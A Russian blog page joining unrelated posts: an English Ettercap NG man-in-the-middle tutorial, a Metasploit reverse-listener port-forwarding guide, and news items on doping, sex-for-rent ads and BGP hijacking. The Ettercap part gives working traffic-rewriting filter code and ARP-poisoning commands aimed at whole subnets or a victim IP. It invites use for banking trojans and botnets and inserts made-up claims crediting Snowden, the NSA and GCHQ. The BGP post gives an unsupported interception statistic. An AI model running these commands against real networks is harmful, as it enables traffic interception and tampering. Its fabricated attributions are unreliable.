Работа в Стамбуле

Блог

  • Ettercap NG is a MiTM tool for intercepting and modifying traffic

    Ettercap NG is a MiTM tool for intercepting and modifying traffic

    Ettercap NG  is an open source comprehensive suite for man in the middle attacks and can be compiled on Linux, BSD, Mac OS X and Windows 200/XP/2003 and can work on wireless 802.11 and wired LANs. Ettercap NG has the ability to route traffic though itself using «Man in the Middle» attacks and then use filters to modify the data before sending it on to the Level3 or AT&T customers.

    Ettercap NG can be extended by using filters and plug-ins, making it able to do all sorts of neat network tasks. Using filters is what the NSA and GCQH do with Ettercap NG. The easiest way to use Ettercap NG is on Windows XP machine. The NSA and GCHQ prefer to use the Ettercap NG-0.7.3.

    In this case Edward Snowden show you how to compromise some host and have the images in web pages replaced by the Jolly Rogers.

    botnet enlargement

    Please feel free to use the skills learned from this paper to do many other useful tasks like on-line banking trojan uploads and botnet enlagement. The first thing you need to do is create an Ettercap NG filter. The sample source code below:

    Source code for ig.filter 

    ############################################################################
    #                                                                          #
    #  Jolly Pwned -- ig.filter -- filter source file                          #
    #                                                                          #
    #  By Irongeek. based on code from ALoR & NaGA                             #
    #  Along with some help from Kev and jon.dmml                              #
    #  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
    #                                                                          #
    #  This program is free software; you can redistribute it and/or modify    #
    #  it under the terms of the GNU General Public License as published by    #
    #  the Free Software Foundation; either version 2 of the License, or       #
    #  (at your option) any later version.                                     #
    #                                                                          #
    ############################################################################
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
       # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src="http://www.irongeek.com/images/jollypwn.png" ");
       replace("IMG SRC=", "img src="http://www.irongeek.com/images/jollypwn.png" ");
       msg("Filter Ran.n");

    }

    The code should be pretty self explanatory to anyone who has done much coding before (it’s very much like C and other languages). The # symbols are comments. The «if» statement tells the filter to only work on TCP packet from source port 80, in other words coming from a web server. This test may still miss some images, but should get most of them. I’m also not sure about Ettercap’s order of operation with AND (&&) and OR (||) statements but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators but this gave me compile errors).  The «replace» function replaces the first parameter string with the second.  Because of the way this string replacement works it will try to mangled image tags and insert the picture you desire into the web page’s HTML before it returns it to the victim. The tags may end up looking something like the following:

    <img src=»http://www.irongeek.com/images/jollypwn.png» /images/original-image.jpg>

    The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The «msg» function just prints to the screen letting us know that the filter has fired off.

    Now that you sort of understand the basics of the filter lets compile it. Take the ig.filter source code listed above and paste it into a text file, then compile the filter into a .ef file using the following command:

            etterfilter ig.filter -o ig.ef

    As soon as filter is compiled you need to target the hosts you want to ARP poison and run the filter on:

    Quote from Ettercap’s MAN page:
    TARGET SPECIFICATION
    There is no concept of SOURCE nor DEST. The two targets are intended to
    filter traffic coming from one to the other and vice-versa (since the
    connection is bidirectional).

    TARGET is in the form MAC/IPs/PORTs. If you want you can omit any of
    its parts and this will represent an ANY in that part.
    e.g.
    «//80» means ANY mac address, ANY ip and ONLY port 80
    «/10.0.0.1/» means ANY mac address, ONLY ip 10.0.0.1 and ANY port

    MAC must be unique and in the form 00:11:22:33:44:55

    IPs is a range of IP in dotted notation. You can specify range with the
    — (hyphen) and single ip with , (comma). You can also use ; (semicolon)
    to indicate different ip addresses.
    e.g.
    «10.0.0.1-5;10.0.1.33» expands into ip 10.0.0.1, 2, 3, 4, 5 and
    10.0.1.33

    PORTs is a range of PORTS. You can specify range with the — (hyphen)
    and single port with , (comma). e.g.
    «20-25,80,110» expands into ports 20, 21, 22, 23, 24, 25, 80 and 110

    NOTE:
    you can reverse the matching of the TARGET by adding the -R option to
    the command line. So if you want to sniff ALL the traffic BUT the one
    coming or going to 10.0.0.1 you can specify «./ettercap -R /10.0.0.1/»

    NOTE:
    TARGETs are also responsible of the initial scan of the lan. You can
    use them to restrict the scan to only a subset of the hosts in the net-
    mask. The result of the merging between the two targets will be
    scanned. remember that not specifying a target means «no target», but
    specifying «//» means «all the hosts in the subnet.

     So, if you wanted to target all hosts on the network you would use the following command:  

        ettercap -T -q -F ig.ef -M ARP // //

    Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If you had a specific victim in mind, let’s say a host with the IP 192.168.22.47, you would use this command:

     ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //

    Here are what the command line option flags do:

    -T tells Ettercap to use the text interface, I like this option the best as the more GUI modes are rather confusing.
    -q tells Ettercap to be more quiet, in other words less verbose.
    -F tells Ettercap to use a filter, in this case ig.ef that you compiled earlier.
    -M tells Ettercap the MITM (Man in the Middle) method you want to use, in this case ARP poisoning.

    Once Ettercap NG is running you would get some output something like the following:

    ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ // output:
    root@Cthulhu:/usr/share/ettercap# ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //

    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

    Content filters loaded from ig.ef…
    Listening on eth0… (Ethernet)

    eth0 -> 00:04:56:B8:70:AD 192.168.19.56 255.255.240.0

    SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534…

    28 plugins
    39 protocol dissectors
    53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services

    Randomizing 4095 hosts for scanning…
    Scanning the whole netmask for 4095 hosts…
    * |==================================================>| 100.00 %

    526 hosts added to the hosts list…

    ARP poisoning victims:

    GROUP 1 : 192.168.22.47 00:04:56:B8:70:AD

    GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing…

    Text only Interface activated…
    Hit ‘h’ for inline helpFilter Ran.
    Filter Ran.

    Below you can see what the Antionline and Binrev web pages look like when the victim tries to view them after Ettercap NG filtering:

    XKEYSCORE surveillance

    PRISM surveillance

    This filter does not seem to fire off for all images, it’s a little hit and miss. For more information on things you can do Ettercap NG filters look at the sample code in the file «etter.filter.examples» that comes along with Ettercap NG. On my box this file is located in /usr/share/ettercap/etter.filter.examples. Also check out Kev’s tutorial on Ettercap NG filters. 

  • Как проверить, что полезная нагрузка может подключиться к машине с Metasploit, расположенной за NAT

    Как проверить, что полезная нагрузка может подключиться к машине с Metasploit, расположенной за NAT

    Если вы проводите тестирование на проникновение и работаете в сети, где раздается NAT, например из дома через маршрутизатор беспроводной сети, то вам необходимо настроить проброс портов на своем маршрутизаторе, чтобы полезная нагрузка могла подключиться к машине с Metasploit.

    Лучшим вариантом было подключиться к Интернету напрямую с белым IP адресом, но это слишком затратно. Настройка переадресации портов не так уж и сложна, но проверить её работоспособность может быть немного сложнее. Жалко только что данный подход нельзя использовать при работе через 3G модем, потому как ему изначально присваивается серый IP адрес и конечно же доступа к маршрутизатору провайдера для настройки проброса портов у вас нет.

    В нашем случае виртуальная машина с установленным Metasploit Pro имеет IP-адрес 192.168.1.169. Выберем порт 4444 в качестве рабочего порта для нашей полезной нагрузки, чтобы избежать путаницы. Я буду показывать пример на маршрутизаторе Asus, ваш маршрутизатор конечно же может иметь другую Web-морду.

    Мой маршрутизатор не поддерживает диапазон для проброса трафика на локальный порт, в противном случае я мог бы указать диапазон 1024-65535 и для внешнего диапазона портов и внутренних локальных портов. Это дало бы полезной нагрузке большее количество портов для возможности обратного подключения, что увеличивает возможное количество сплоитов, которые одновременно вы могли бы запустить на удаленной машине. Не стесняйтесь экспериментировать с этим, если ваш маршрутизатор поддерживает это — это сделает ваш тест на проникновение быстрее и даст вам больше шансов на успех, но мы сработаем через один единственный порт, который я уже назначил.

    Теперь давайте проверим, как работает наш проброс портов на маршрутизаторе, который мы настроили. Для этого во вкладке Модули найдем модуль «Generic Payload Handler»:

    Запускаем этот модуль. Теперь нам нужно узнать наш публичный адрес IP. Это можно либо посмотреть в настройках маршрутизатора, или перейдите на internet.yandex.ru
    Вводим этот адрес в поле Listener Host, оставляем список портов слушателя по умолчанию 4444-4444. Вы должны использовать диапазон, а не значение, в противном случае модуль не будет работать. Запускаем модуль. Теперь у нас есть активный слушатель, работающий на Metasploit машине, и порт 4444, который проброшен на эту же машину.

    Теперь проверим, работает проброс портов или нет. На сайте www.canyouseeme.org введем порт 4444 в поле и нажмем Can You See Me кнопку. Если все сделали правильно, то вы увидите сообщение что-то вроде этого:

    Если вы получаете сообщение, что порт не доступен, это может быть потому, что порты могут быть заблокированы провайдером в некоторых случаях.

    Перед тем, как начать с тест на проникновение, вы должны остановить Generic Payload Handler задачу. Теперь при выборе сплоита вы должны указывать Listener Port 4444.

  • Кокаин попал в меня во время секса

    Кокаин попал в меня во время секса

    Чемпион мира по прыжкам с шестом Шон Барбер

    Чемпион мира по прыжкам с шестом Шон Барбер не нарушил спортивных правил и имел право выступать на Олимпиаде в Рио-де-Жанейро, несмотря на положительную допинг-пробу на кокаин. Как заявила Федерация легкой атлетики Канады, наркотик попал в организм спортсмена без его ведома.

    В случае признания виновным Барберу угрожала дисквалификация со стороны Канадского центра по этике в спорте сроком до двух лет. Комиссии, рассматривавшей его дело 5 августа, он сообщил, что наркотик попал в его организм через поцелуй.

    22-летний атлет рассказал, что вечером накануне национального отборочного турнира Олимпиады-2016 он разместил анкету на сайте знакомств в интернете, где написал, что ищет случайной связи с девушкой «чистой от наркотиков и болезней».

    Как выяснилось в ходе разбирательства, Барбер искал секса для того, чтобы снять нервное напряжение. Женщина, с которой он имел контакт, пояснила, что употребляла наркотик перед свиданием, а во время их встречи поцеловала атлета несколько раз, не проинформировав его о том, что принимала кокаин.

    Его дело рассматривалось в день открытия Олимпийских игр в Рио, а решение было вынесено шестью днями позже, 11 августа. «Я ни на одно мгновение не мог допустить даже отдаленной мысли, что смогу загрязниться кокаином», — сообщил Барбер в своем заявлении.

    Независимый арбитраж, рассмотревший этот случай, пришел к заключению, что в действиях спортсмена не было ни умысла, ни преступной небрежности. Федерация легкой атлетики Канады приветствовала это решение, назвав его справедливым и продуманным.

    Как рассказал адвокат спортсмена, судмедэксперты пришли к заключению, что он не мог принять столь малую дозу наркотика намеренно.

    Барбер выступал на Олимпиаде 15 августа, и по его признанию, игры стали для него непростым испытанием.

    Будучи чемпионом мира 2015 года и бронзовым медалистом игр Содружества в 2014 году, 22-летний спортсмен был одной из главных олимпийских надежд своей страны. Тем не менее в Рио ему удалось занять только 10-е место.

    Аналогичный случай имел место с французским теннисистом Ришаром Гаске. Он был отстранен от соревнований на 12 месяцев, однако в 2009 году запрет был снят, после того как спортсмену удалось доказать, что запрещенное вещество попало в его организм через поцелуй.

  • Владельцы лондонской недвижимости предлагают жилье в обмен на секс

    Владельцы лондонской недвижимости предлагают жилье в обмен на секс

    отели сочи

    Оплату аренды жилья сексуальными услугами предлагают владельцы недвижимости Лондона и окрестностей. Объявления с подобными предложениями размещены в Интернете.

    В Великобритании нет запрета на рекламу секс-услуг в Интернете, но авторы подобных объявлений публикуют их в разделе объявлений об аренде или продаже недвижимости, пишет Дом.Lenta.ru.

    На сайте  Craigslist можно найти предложения «бесплатной аренды для симпатичной девушки» или «бесплатного койко-места для женщины в центре Лондона» с условием, что женщина будет вступать в интимные отношения с владельцем как минимум раз в неделю.

    Средняя стоимость аренды квартиры или дома для одного человека в британской столицы составляет 166 долларов за ночь.

  • Угон IP трафика при помощи BGP и перехват транзакций биткоин сети

    Бывший контрактник АНБ и сотрудник Booz Allen Hamilton и эксперт в области компьютерных сетей Эдвард Сноуден на днях рассказал о том, что протокол BGP

    , который используется во всех мощных маршрутизаторах интернета, перекачивающих и направляющих данные в 130 тыс. сетей, нуждается в серьезном внимании. Этот протокол был разработан очень давно, и в нем никак не учитываются современные требования к обеспечению безопасности сетей, сообщил Сноуден.

    С помощью протокола BGP маршрутизаторы могут обмениваться информацией о наиболее эффективных путях доставки пакетов данных из одной сети в другую. При этом, однако, в большинстве случаев никакой взаимной аутентификации не производится. То есть какой угодно маршрутизатор может направить любому другому маршрутизатору совершенно произвольный маршрут передачи пакетов, и никакой проверки правильности этого маршрута проводиться не будет.

    Поэтому в случае, если нарушитель получит доступ к маршрутизатору и изменит его настройки, он получит возможность произвольным образом перенаправлять трафик из одной сети в другую. Если нарушитель решит вывести из строя какую-либо сеть, ему достаточно будет направить в нее большой объем трафика. В результате атаки работа целевой сети замедлится, а то и вовсе прекратится.

    Такой доверчивости маршрутизаторов необходимо положить конец, считает Сноуден. В настоящее время организация Internet Engineering Task Force ведет разработку обновленной версии протокола BGP, в которой будут заложены механизмы идентификации маршрутизаторов и другие средства обеспечения безопасности. И хотя переход на новый протокол влетит провайдерам и операторам сетей в копеечку, он является жизненно необходимым, полагает эксперт.

    Хочу добавить, что в последнее время чрезмерная доверчивость маршрутизаторов часто используется различными дельцами для изменения маршрутов трафика в сети интернет и перехвата биткоин транзакций. По статистике 8 — 10% от общего числа транзакций сети Bitcoin перехватывается нарушителями.